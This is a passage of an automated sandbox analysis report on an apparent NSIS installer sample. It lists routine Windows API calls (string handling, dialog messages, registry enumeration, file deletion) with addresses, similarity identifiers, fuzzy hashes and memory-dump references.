• CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
• CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
• CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
• CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 589700163-1201062745
                                                                                                                                                                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                            • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                                                                                                                                                                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                            • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                                                                                                                                                                            • GetMessagePos.USER32 ref: 00404E41
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404E5B
                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                                                                                                                                                                            Strings
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
• Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
• Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
• Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
• MulDiv.KERNEL32(00110DF8,00000064,?), ref: 00402FDC
• wsprintfW.USER32 ref: 00402FEC
• SetWindowTextW.USER32(?,?), ref: 00402FFC
• SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
Strings
• verifying installer: %d%%, xrefs: 00402FE6
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
• Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
• Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
• Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
• GlobalFree.KERNEL32(?), ref: 00402A06
• GlobalFree.KERNEL32(00000000), ref: 00402A19
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
• Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
• Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
• Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
APIs
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
Similarity
• API ID: CloseEnum$DeleteValue
• String ID:
• API String ID: 1354259210-0
• Opcode ID: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
• Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
• Opcode Fuzzy Hash: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
• Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
APIs
• GetDlgItem.USER32(?,?), ref: 00401D9A
• GetClientRect.USER32(?,?), ref: 00401DE5
• LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
• SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
• DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                            • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                            • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                                                                                                                                                                            • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2584051700-0
                                                                                                                                                                            • Opcode ID: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                            • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                                                                                                                                                                            • Opcode Fuzzy Hash: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                            • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                            • String ID: !
                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                            • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                            • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                                                                                                                                                                            • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                            • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                                                                                                                                            • wsprintfW.USER32 ref: 00404DBA
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                            • Opcode ID: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                            • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                                                                                                                                                                            • Opcode Fuzzy Hash: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                            • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                                                                                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 2659869361-823278215
                                                                                                                                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                            • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                                                                                                                                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                            • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                            • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                                                                                                                                            • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                                                                                                                                            • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                                                                                                                                            • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 3248276644-823278215
                                                                                                                                                                            • Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                                                                                                                                            • Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
                                                                                                                                                                            • Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                                                                                                                                            • Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040550C
                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                                                                                                                                                                              • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                            • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                            • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                                                                                                                                                                            • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                            • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403B42
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
